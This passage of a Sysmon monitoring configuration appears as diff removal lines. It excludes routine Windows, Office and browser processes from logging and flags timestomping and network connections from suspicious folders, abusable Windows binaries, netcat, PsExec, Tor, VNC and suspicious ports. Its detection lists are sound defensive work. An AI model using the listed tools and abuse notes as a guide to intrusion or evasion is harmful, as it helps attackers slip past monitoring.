-		<!--DATA: UtcTime, ProcessGuid, ProcessID, Image, FileVersion, Description, Product, Company, CommandLine, CurrentDirectory, User, LogonGuid, LogonId, TerminalSessionId, IntegrityLevel, Hashes, ParentProcessGuid, ParentProcessId, ParentImage, ParentCommandLine, RuleName-->
-	<RuleGroup name="" groupRelation="or">
-		<ProcessCreate onmatch="exclude">
-			<!--SECTION: Microsoft Windows-->
-			<CommandLine condition="begin with"> "C:\Windows\system32\wermgr.exe" "-queuereporting_svc" </CommandLine> <!--Windows:Windows error reporting/telemetry-->
-			<CommandLine condition="begin with">C:\Windows\system32\DllHost.exe /Processid</CommandLine> <!--Windows-->
-			<CommandLine condition="begin with">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</CommandLine> <!--Windows: WMI provider host-->
-			<CommandLine condition="begin with">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</CommandLine> <!--Windows: WMI provider host-->
-			<CommandLine condition="is">C:\Windows\system32\wermgr.exe -upload</CommandLine> <!--Windows:Windows error reporting/telemetry-->
-			<CommandLine condition="is">C:\Windows\system32\SearchIndexer.exe /Embedding</CommandLine> <!--Windows: Search Indexer-->
-			<CommandLine condition="is">C:\windows\system32\wermgr.exe -queuereporting</CommandLine> <!--Windows:Windows error reporting/telemetry-->
-			<CommandLine condition="is">\??\C:\Windows\system32\autochk.exe *</CommandLine> <!--Microsoft:Bootup: Auto Check Utility-->
-			<CommandLine condition="is">\SystemRoot\System32\smss.exe</CommandLine> <!--Microsoft:Bootup: Windows Session Manager-->
-			<CommandLine condition="is">C:\Windows\System32\RuntimeBroker.exe -Embedding</CommandLine> <!--Windows:Apps permissions [ https://fossbytes.com/runtime-broker-process-windows-10/ ] -->
-			<Image condition="is">C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe</Image> <!--Windows: Touch Keyboard and Handwriting Panel Helper-->
-			<Image condition="is">C:\Windows\System32\TokenBrokerCookies.exe</Image> <!--Windows: SSO sign-in assistant for MicrosoftOnline.com-->
-			<Image condition="is">C:\Windows\System32\plasrv.exe</Image> <!--Windows: Performance Logs and Alerts DCOM Server-->
-			<Image condition="is">C:\Windows\System32\wifitask.exe</Image> <!--Windows: Wireless Background Task-->
-			<Image condition="is">C:\Windows\system32\CompatTelRunner.exe</Image> <!--Windows: Customer Experience Improvement-->
-			<Image condition="is">C:\Windows\system32\PrintIsolationHost.exe</Image> <!--Windows: Printing-->
-			<Image condition="is">C:\Windows\system32\SppExtComObj.Exe</Image> <!--Windows: KMS activation-->
-			<Image condition="is">C:\Windows\system32\audiodg.exe</Image> <!--Windows: Launched constantly-->
-			<Image condition="is">C:\Windows\system32\conhost.exe</Image> <!--Windows: Command line interface host process-->
-			<Image condition="is">C:\Windows\system32\mobsync.exe</Image> <!--Windows: Network file syncing-->
-			<Image condition="is">C:\Windows\system32\musNotification.exe</Image> <!--Windows: Update pop-ups-->
-			<Image condition="is">C:\Windows\system32\musNotificationUx.exe</Image> <!--Windows: Update pop-ups-->
-			<Image condition="is">C:\Windows\system32\powercfg.exe</Image> <!--Microsoft:Power configuration management-->
-			<Image condition="is">C:\Windows\system32\sndVol.exe</Image> <!--Windows: Volume control-->
-			<Image condition="is">C:\Windows\system32\sppsvc.exe</Image> <!--Windows: Software Protection Service-->
-			<Image condition="is">C:\Windows\system32\wbem\WmiApSrv.exe</Image> <!--Windows: WMI performance adapter host process-->
-			<IntegrityLevel condition="is">AppContainer</IntegrityLevel> <!--Windows: Don't care about sandboxed processes right now. Will need to revisit this decision.-->
-			<ParentCommandLine condition="begin with">%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows</ParentCommandLine> <!--Windows:CommandShell: Triggered when programs use the command shell, but doesn't provide attribution for what caused it-->
-			<ParentCommandLine condition="is">C:\windows\system32\wermgr.exe -queuereporting</ParentCommandLine> <!--Windows:Windows error reporting/telemetry-->
-			<CommandLine condition="is">C:\WINDOWS\system32\devicecensus.exe UserCxt</CommandLine>
-			<CommandLine condition="is">C:\Windows\System32\usocoreworker.exe -Embedding</CommandLine>
-			<ParentImage condition="is">C:\Windows\system32\SearchIndexer.exe</ParentImage> <!--Windows:Search: Launches many uninteresting sub-processes-->
-			<!--SECTION: Windows:svchost-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k appmodel -s StateRepository</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k appmodel</CommandLine> <!--Windows 10-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k appmodel -p -s tiledatamodelsvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k camera -s FrameServer</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k dcomlaunch -s LSM</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k dcomlaunch -s PlugPlay</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k defragsvc</CommandLine> <!--Windows defragmentation-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k devicesflow -s DevicesFlowUserSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k imgsvc</CommandLine> <!--Microsoft:The Windows Image Acquisition Service-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localService -s EventSystem</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localService -s bthserv</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localService -s nsi</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localService -s w32Time</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceAndNoImpersonation</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted -s Dhcp</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted -s EventLog</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted -s TimeBrokerSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted -s WFDSConMgrSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -s BTAGService</CommandLine>
-			<CommandLine condition="is">C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService</CommandLine> <!--Win10:1903:Network Connection Broker-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceAndNoImpersonation -s SensrSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceAndNoImpersonation -p -s SSDPSRV</CommandLine> <!--Windows:SSDP [ https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol ] -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNoNetwork</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -p -s WPDBusEnum</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -p -s fhsvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s DeviceAssociationService</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s NcbService</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s SensorService</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s TabletInputService</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s UmRdpService</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s WPDBusEnum</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -p -s NgcSvc</CommandLine> <!--Microsoft:Passport--> 
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceNetworkRestricted -p -s NgcCtnrSvc</CommandLine> <!--Microsoft:Passport Container--> 
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localServiceAndNoImpersonation -s SCardSvr</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</CommandLine>
-			<CommandLine condition="is">C:\Windows\System32\svchost.exe -k netsvcs -p -s SessionEnv</CommandLine> <!--Windows:Remote desktop configuration-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted -s WdiSystemHost</CommandLine> <!--Windows: Diagnostic System Host [ http://www.blackviper.com/windows-services/diagnostic-system-host/ ] -->
-			<CommandLine condition="is">C:\Windows\System32\svchost.exe -k localSystemNetworkRestricted -p -s WdiSystemHost</CommandLine> <!--Windows: Diagnostic System Host [ http://www.blackviper.com/windows-services/diagnostic-system-host/ ] -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted</CommandLine> <!--Windows-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc</CommandLine> <!--Windows: Windows Live Sign-In Assistant [ https://www.howtogeek.com/howto/30348/what-are-wlidsvc.exe-and-wlidsvcm.exe-and-why-are-they-running/ ] -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -p -s ncaSvc</CommandLine> <!--Windows: Network Connectivity Assistant [ http://www.blackviper.com/windows-services/network-connectivity-assistant/ ] -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s BDESVC</CommandLine> <!--Windows:Network: BitLocker Drive Encryption-->
-			<CommandLine condition="is">C:\Windows\System32\svchost.exe -k netsvcs -p -s BDESVC</CommandLine> <!--Microsoft:Win10:1903:Network: BitLocker Drive Encryption-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -p -s BITS</CommandLine> <!--Windows:Network: Background Intelligent File Transfer (BITS) -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s BITS</CommandLine> <!--Windows:Network: Background Intelligent File Transfer (BITS) -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s CertPropSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s Gpsvc</CommandLine> <!--Windows:Network: Group Policy -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s ProfSvc</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s SENS</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s SessionEnv</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s Themes</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs -s Winmgmt</CommandLine> <!--Windows: Windows Management Instrumentation (WMI) -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService -p -s DoSvc</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService -s Dnscache</CommandLine> <!--Windows:Network: DNS caching, other uses -->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService -s LanmanWorkstation</CommandLine> <!--Windows:Network: "Workstation" service, used for SMB file-sharing connections and RDP-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService -s NlaSvc</CommandLine> <!--Windows:Network: Network Location Awareness-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService -s TermService</CommandLine> <!--Windows:Network: Terminal Services (RDP)-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkService</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k networkServiceNetworkRestricted</CommandLine> <!--Windows: Network services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k rPCSS</CommandLine> <!--Windows Services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k secsvcs</CommandLine>
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k swprv</CommandLine> <!--Microsoft:Software Shadow Copy Provider-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k unistackSvcGroup</CommandLine> <!--Windows 10-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k utcsvc</CommandLine> <!--Windows Services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k wbioSvcGroup</CommandLine> <!--Windows Services-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k werSvcGroup</CommandLine> <!--Windows: ErrorReporting-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc</CommandLine> <!--Windows: Update Medic Service [ https://www.thewindowsclub.com/windows-update-medic-service ] -->
-			<CommandLine condition="is">C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC</CommandLine> <!--Windows:Apps: Client License Service-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</CommandLine> <!--Windows:Apps: AppX Deployment Service-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k wsappx -s ClipSVC</CommandLine> <!--Windows:Apps: Client License Service-->
-			<CommandLine condition="is">C:\Windows\system32\svchost.exe -k wsappx</CommandLine> <!--Windows:Apps [ https://www.howtogeek.com/320261/what-is-wsappx-and-why-is-it-running-on-my-pc/ ] -->
-			<ParentCommandLine condition="is">C:\Windows\system32\svchost.exe -k netsvcs</ParentCommandLine> <!--Windows: Network services: Spawns Consent.exe-->
-			<ParentCommandLine condition="is">C:\Windows\system32\svchost.exe -k localSystemNetworkRestricted</ParentCommandLine> <!--Windows-->
-			<CommandLine condition="is">C:\Windows\system32\deviceenroller.exe /c /AutoEnrollMDM</CommandLine> <!--Windows: AzureAD device enrollment agent-->
-			<!--SECTION: Microsoft:Edge-->
-			<CommandLine condition="begin with">"C:\Program Files (x86)\Microsoft\Edge Dev\Application\msedge.exe" --type=</CommandLine>
-			<!--SECTION: Microsoft:dotNet-->
-			<CommandLine condition="begin with">C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe</CommandLine> <!--Microsoft:DotNet-->
-			<CommandLine condition="begin with">C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\Ngen.exe</CommandLine> <!--Microsoft:DotNet-->
-			<Image condition="is">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe</Image> <!--Microsoft:DotNet-->
-			<Image condition="is">C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</Image> <!--Microsoft:DotNet-->
-			<Image condition="is">C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe</Image> <!--Windows: Font cache service-->
-			<ParentCommandLine condition="contains">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe</ParentCommandLine>
-			<ParentImage condition="is">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe</ParentImage> <!--Microsoft:DotNet-->
-			<ParentImage condition="is">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe</ParentImage> <!--Microsoft:DotNet-->
-			<ParentImage condition="is">C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</ParentImage> <!--Microsoft:DotNet-->
-			<ParentImage condition="is">C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe</ParentImage> <!--Microsoft:DotNet: Spawns thousands of ngen.exe processes-->
-			<!--SECTION: Microsoft:Office-->
-			<Image condition="is">C:\Program Files\Microsoft Office\Office16\MSOSYNC.EXE</Image> <!--Microsoft:Office: Background process for SharePoint/Office365 connectivity-->
-			<Image condition="is">C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE</Image> <!--Microsoft:Office: Background process for SharePoint/Office365 connectivity-->
-			<Image condition="is">C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE</Image> <!--Microsoft:Office: Licensing service-->
-			<Image condition="is">C:\Program Files\Microsoft Office\Office16\msoia.exe</Image> <!--Microsoft:Office: Telemetry collector-->
-			<Image condition="is">C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe</Image>
-			<!--SECTION: Microsoft:Office:Click2Run-->
-			<Image condition="is">C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe</Image> <!--Microsoft:Office: Background process-->
-			<ParentImage condition="is">C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe</ParentImage> <!--Microsoft:Office: Background process-->
-			<ParentImage condition="is">C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe</ParentImage> <!--Microsoft:Office: Background process-->
-			<!--SECTION: Windows: Media player-->
-			<Image condition="is">C:\Program Files\Windows Media Player\wmpnscfg.exe</Image> <!--Windows: Windows Media Player Network Sharing Service Configuration Application-->
-			<!--SECTION: Google-->
-			<CommandLine condition="begin with">"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=</CommandLine> <!--Google:Chrome: massive command-line arguments-->
-			<CommandLine condition="begin with">"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=</CommandLine> <!--Google:Chrome: massive command-line arguments-->
-		</ProcessCreate>
-	</RuleGroup>
-	
-	<!--SYSMON EVENT ID 2 : FILE CREATION TIME RETROACTIVELY CHANGED IN THE FILESYSTEM [FileCreateTime]-->
-		<!--COMMENT:	[ https://attack.mitre.org/wiki/Technique/T1099 ] -->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, TargetFilename, CreationUtcTime, PreviousCreationUtcTime-->
-	<RuleGroup name="" groupRelation="or">
-		<FileCreateTime onmatch="include">
-			<Image name="T1099" condition="begin with">C:\Users</Image> <!--Look for timestomping in user area, usually nothing should be doing that here-->
-			<TargetFilename name="T1099" condition="end with">.exe</TargetFilename> <!--Look for backdated executables anywhere-->
-			<Image name="T1099" condition="begin with">\Device\HarddiskVolumeShadowCopy</Image> <!--Nothing should be written here | Credit: @SBousseaden [ https://twitter.com/SBousseaden/status/1133030955407630336 ] -->
-		</FileCreateTime>
-	</RuleGroup>
-
-	<RuleGroup name="" groupRelation="or">
-		<FileCreateTime onmatch="exclude">
-			<Image condition="image">OneDrive.exe</Image> <!--OneDrive constantly changes file times-->
-			<Image condition="image">C:\Windows\system32\backgroundTaskHost.exe</Image>
-			<Image condition="contains">setup</Image> <!--Ignore setups-->
-			<Image condition="contains">install</Image> <!--Ignore setups-->
-			<Image condition="contains">Update\</Image> <!--Ignore setups-->
-			<Image condition="end with">redist.exe</Image> <!--Ignore setups-->
-			<Image condition="is">msiexec.exe</Image> <!--Ignore setups-->
-			<Image condition="is">TrustedInstaller.exe</Image> <!--Ignore setups-->
-		</FileCreateTime>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 3 : NETWORK CONNECTION INITIATED [NetworkConnect]-->
-		<!--COMMENT:	By default this configuration takes a very conservative approach to network logging, limited to only extremely high-signal events.-->
-		<!--COMMENT:	[ https://attack.mitre.org/wiki/Command_and_Control ] [ https://attack.mitre.org/wiki/Exfiltration ] [ https://attack.mitre.org/wiki/Lateral_Movement ] -->
-		<!--TECHNICAL:	For the DestinationHostname, Sysmon uses the GetNameInfo API, which will often not have any information, and may just be a CDN. This is NOT reliable for filtering.-->
-		<!--TECHNICAL:	For the DestinationPortName, Sysmon uses the GetNameInfo API for the friendly name of ports you see in logs.-->
-		<!--TECHNICAL:	These exe do not initiate their connections, and thus includes do not work in this section: BITSADMIN NLTEST-->
-		
-		<!-- https://www.first.org/resources/papers/conf2017/APT-Log-Analysis-Tracking-Attack-Tools-by-Audit-Policy-and-Sysmon.pdf -->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, User, Protocol, Initiated, SourceIsIpv6, SourceIp, SourceHostname, SourcePort, SourcePortName, DestinationIsIpV6, DestinationIp, DestinationHostname, DestinationPort, DestinationPortName-->
-	<RuleGroup name="" groupRelation="or">
-		<NetworkConnect onmatch="include">
-			<!--Suspicious sources for network-connecting binaries-->
-			<Image name="Usermode" condition="begin with">C:\Users</Image> <!--Tools downloaded by users can use other processes for networking, but this is a very valuable indicator.-->
-			<Image name="Caution" condition="begin with">C:\Recycle</Image> <!--Nothing should operate from the RecycleBin locations.-->
-			<Image condition="begin with">C:\ProgramData</Image> <!--Normally, network communications should be sourced from "Program Files" not from ProgramData, something to look at-->
-			<Image condition="begin with">C:\Windows\Temp</Image> <!--Suspicious anything would communicate from the system-level temp directory-->
-			<Image name="Caution" condition="begin with">\</Image> <!--Devices and VSC shouldn't be executing changes | Credit: @SBousseaden @ionstorm @neu5ron @PerchedSystems [ https://twitter.com/SwiftOnSecurity/status/1133167323991486464 ] -->
-			<Image name="Caution" condition="begin with">C:\perflogs</Image> <!-- Credit @blu3_team [ https://blu3-team.blogspot.com/2019/05/netconn-from-suspicious-directories.html ] -->
-			<Image name="Caution" condition="begin with">C:\intel</Image> <!-- Credit @blu3_team [ https://blu3-team.blogspot.com/2019/05/netconn-from-suspicious-directories.html ] -->
-			<Image name="Caution" condition="begin with">C:\Windows\fonts</Image> <!-- Credit @blu3_team [ https://blu3-team.blogspot.com/2019/05/netconn-from-suspicious-directories.html ] -->
-			<Image name="Caution" condition="begin with">C:\Windows\system32\config</Image> <!-- Credit @blu3_team [ https://blu3-team.blogspot.com/2019/05/netconn-from-suspicious-directories.html ] -->
-			<!--Suspicious Windows tools-->
-			<Image condition="image">at.exe</Image> <!--Windows: Remote task scheduling, removed in Win10 | Credit @ion-storm -->
-			<Image condition="image">certutil.exe</Image> <!--Windows: Certificate tool can contact outbound | Credit @ion-storm @FVT [ https://twitter.com/FVT/status/834433734602530817 ] -->
-			<Image condition="image">cmd.exe</Image> <!--Windows: Remote command prompt-->
-			<Image condition="image">cmstp.exe</Image> <!--Windows: Connection manager profiles can launch executables from WebDAV [ https://twitter.com/NickTyrer/status/958450014111633408 ] | Credit @NickTyrer @Oddvarmoe @KyleHanslovan @subTee -->
-			<Image condition="image">cscript.exe</Image> <!--WindowsScriptingHost: | Credit @Cyb3rOps [ https://gist.github.com/Neo23x0/a4b4af9481e01e749409 ] -->
-			<Image condition="image">driverquery.exe</Image> <!--Windows: Remote recognisance of system configuration, oudated/vulnerable drivers -->
-			<Image condition="image">dsquery.exe</Image> <!--Microsoft: Query Active Directory -->
-			<Image condition="image">hh.exe</Image> <!--Windows: HTML Help Executable, opens CHM files -->
-			<Image condition="image">infDefaultInstall.exe</Image> <!--Microsoft: [ https://github.com/huntresslabs/evading-autoruns ] | Credit @KyleHanslovan -->
-			<Image condition="image">java.exe</Image> <!--Java: Monitor usage of vulnerable application and init from JAR files | Credit @ion-storm -->
-			<Image condition="image">javaw.exe</Image> <!--Java: Monitor usage of vulnerable application and init from JAR files -->
-			<Image condition="image">javaws.exe</Image> <!--Java: Monitor usage of vulnerable application and init from JAR files -->
-			<Image condition="image">mmc.exe</Image> <!--Windows: -->
-			<Image condition="image">msbuild.exe</Image> <!--Windows: [ https://www.hybrid-analysis.com/sample/a314f6106633fba4b70f9d6ddbee452e8f8f44a72117749c21243dc93c7ed3ac?environmentId=100 ] -->
-			<Image condition="image">mshta.exe</Image> <!--Windows: HTML application executes scripts without IE protections | Credit @ion-storm [ https://en.wikipedia.org/wiki/HTML_Application ] -->
-			<Image condition="image">msiexec.exe</Image> <!--Windows: Can install from http:// paths | Credit @vector-sec -->
-			<Image condition="image">nbtstat.exe</Image> <!--Windows: NetBIOS statistics, attackers use to enumerate local network -->
-			<Image condition="image">net.exe</Image> <!--Windows: Note - May not detect anything, net.exe is a front-end to lower APIs | Credit @ion-storm -->
-			<Image condition="image">net1.exe</Image> <!--Windows: Launched by "net.exe", but it may not detect connections either -->
-			<Image condition="image">notepad.exe</Image> <!--Windows: [ https://secrary.com/ReversingMalware/CoinMiner/ ] [ https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ ] -->
-			<Image condition="image">nslookup.exe</Image> <!--Windows: Retrieve data over DNS -->
-			<Image condition="image">powershell.exe</Image> <!--Windows: PowerShell interface-->
-			<Image condition="image">qprocess.exe</Image> <!--Windows: [ https://www.first.org/resources/papers/conf2017/APT-Log-Analysis-Tracking-Attack-Tools-by-Audit-Policy-and-Sysmon.pdf ] -->
-			<Image condition="image">qwinsta.exe</Image> <!--Windows: Query remote sessions | Credit @ion-storm -->
-			<Image condition="image">qwinsta.exe</Image> <!--Windows: Remotely query login sessions on a server or workstation | Credit @ion-storm -->
-			<Image condition="image">reg.exe</Image> <!--Windows: Remote Registry editing ability | Credit @ion-storm -->
-			<Image condition="image">regsvcs.exe</Image> <!--Windows: [ https://www.hybrid-analysis.com/sample/3f94d7080e6c5b8f59eeecc3d44f7e817b31562caeba21d02ad705a0bfc63d67?environmentId=100 ] -->
-			<Image condition="image">regsvr32.exe</Image> <!--Windows: [ https://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html ] -->
-			<Image condition="image">rundll32.exe</Image> <!--Windows: [ https://blog.cobaltstrike.com/2016/07/22/why-is-rundll32-exe-connecting-to-the-internet/ ] -->
-			<Image condition="image">rwinsta.exe</Image> <!--Windows: Disconnect remote sessions | Credit @ion-storm -->
-			<Image condition="image">sc.exe</Image> <!--Windows: Remotely change Windows service settings | Credit @ion-storm -->
-			<Image condition="image">schtasks.exe</Image> <!--Windows: Command-line interface to local and remote tasks -->
-			<Image condition="image">taskkill.exe</Image> <!--Windows: Kill processes, has remote ability -->
-			<Image condition="image">tasklist.exe</Image> <!--Windows: List processes, has remote ability -->
-			<Image condition="image">wmic.exe</Image> <!--WindowsManagementInstrumentation: Credit @Cyb3rOps [ https://gist.github.com/Neo23x0/a4b4af9481e01e749409 ] -->
-			<Image condition="image">wscript.exe</Image> <!--WindowsScriptingHost: | Credit @arekfurt -->
-			<!--Relevant 3rd Party Tools-->
-			<Image condition="image">nc.exe</Image> <!-- Nmap's modern version of netcat [ https://nmap.org/ncat/guide/index.html#ncat-overview ] [ https://securityblog.gr/1517/create-backdoor-in-windows-with-ncat/ ] -->
-			<Image condition="image">ncat.exe</Image> <!-- Nmap's modern version of netcat [ https://nmap.org/ncat/guide/index.html#ncat-overview ] [ https://securityblog.gr/1517/create-backdoor-in-windows-with-ncat/ ] -->
-			<Image condition="image">psexec.exe</Image> <!--Sysinternals:PsExec client side | Credit @Cyb3rOps -->
-			<Image condition="image">psexesvc.exe</Image> <!--Sysinternals:PsExec server side | Credit @Cyb3rOps -->
-			<Image condition="image">tor.exe</Image> <!--Tor [ https://www.hybrid-analysis.com/sample/800bf028a23440134fc834efc5c1e02cc70f05b2e800bbc285d7c92a4b126b1c?environmentId=100 ] -->
-			<Image condition="image">vnc.exe</Image> <!-- VNC client | Credit @Cyb3rOps -->
-			<Image condition="image">vncservice.exe</Image> <!-- VNC server | Credit @Cyb3rOps -->
-			<Image condition="image">vncviewer.exe</Image> <!-- VNC client | Credit @Cyb3rOps -->
-			<Image condition="image">winexesvc.exe</Image> <!-- Winexe service executable | Credit @Cyb3rOps -->
-			<Image condition="image">nmap.exe</Image>
-			<Image condition="image">psinfo.exe</Image>
-			<!--Ports: Suspicious-->
-			<DestinationPort name="SSH" condition="is">22</DestinationPort> <!--SSH protocol, monitor admin connections-->
-			<DestinationPort name="Telnet" condition="is">23</DestinationPort> <!--Telnet protocol, monitor admin connections, insecure-->
-			<DestinationPort name="SMTP" condition="is">25</DestinationPort> <!--SMTP mail protocol port, insecure, used by threats-->
-			<DestinationPort name="IMAP" condition="is">143</DestinationPort> <!--IMAP mail protocol port, insecure, used by threats-->
-			<DestinationPort name="RDP" condition="is">3389</DestinationPort> <!--Windows:RDP: Monitor admin connections-->
-			<DestinationPort name="VNC" condition="is">5800</DestinationPort> <!--VNC protocol: Monitor admin connections, often insecure, using hard-coded admin password-->
-			<DestinationPort name="VNC" condition="is">5900</DestinationPort> <!--VNC protocol Monitor admin connections, often insecure, using hard-coded admin password-->
-			<DestinationPort name="Alert,Metasploit" condition="is">444</DestinationPort>
-			<!--Ports: Proxy-->
-			<DestinationPort name="Proxy" condition="is">1080</DestinationPort> <!--Socks proxy port | Credit @ion-storm-->
-			<DestinationPort name="Proxy" condition="is">3128</DestinationPort> <!--Socks proxy port | Credit @ion-storm-->
-			<DestinationPort name="Proxy" condition="is">8080</DestinationPort> <!--Socks proxy port | Credit @ion-storm-->
-			<!--Ports: Tor-->
-			<DestinationPort name="Tor" condition="is">1723</DestinationPort> <!--Tor protocol [ https://attack.mitre.org/wiki/Technique/T1090 ] | Credit @ion-storm-->
